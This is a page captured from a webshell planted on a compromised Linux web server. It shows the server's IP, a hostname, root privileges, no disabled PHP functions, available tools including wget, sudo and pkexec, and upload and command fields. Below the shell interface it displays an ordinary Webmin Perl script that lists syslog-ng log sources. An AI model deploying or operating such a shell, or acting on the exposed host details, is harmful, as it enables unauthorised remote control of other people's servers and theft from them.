403Webshell
Server IP : 39.108.156.168  /  Your IP : 216.73.216.104
Web Server : nginx/1.24.0
System : Linux e2.ksyuki.com 6.11.0-25-generic #25~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue Apr 15 17:20:50 UTC 2 x86_64
User : root ( 0)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/webmin/syslog-ng/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/webmin/syslog-ng/list_sources.cgi
#!/usr/bin/perl
# Show a list of log sources

require './syslog-ng-lib.pl';
&ui_print_header(undef, $text{'sources_title'}, "", "sources");

$conf = &get_config();
@sources = &find("source", $conf);
@links = ( &select_all_link("d"),
	   &select_invert_link("d"),
	   &ui_link("edit_source.cgi?new=1",$text{'sources_add'}) );
if (@sources) {
	@tds = ( "width=5" );
	print &ui_form_start("delete_sources.cgi", "post");
	print &ui_links_row(\@links);
	print &ui_columns_start([ "",
				  $text{'sources_source'},
				  $text{'sources_desc'},
				  ], undef, 0, \@tds);
	foreach $f (@sources) {
		$desc = &nice_source_desc($f);
		print &ui_checked_columns_row([
			&ui_link("edit_source.cgi?name=$f->{'value'}",$f->{'value'}),
			$desc || "<i>$text{'sources_none2'}</i>",
			], \@tds, "d", $f->{'value'});
		}
	print &ui_columns_end();
	print &ui_links_row(\@links);
	print &ui_form_end([ [ "delete", $text{'sources_delete'} ] ]);
	}
else {
	print "<b>$text{'sources_none'}</b><p>\n";
	print &ui_links_row([ $links[2] ]);
	}

&ui_print_footer("", $text{'index_return'});


Youez - 2016 - github.com/yon3zu
LinuXploit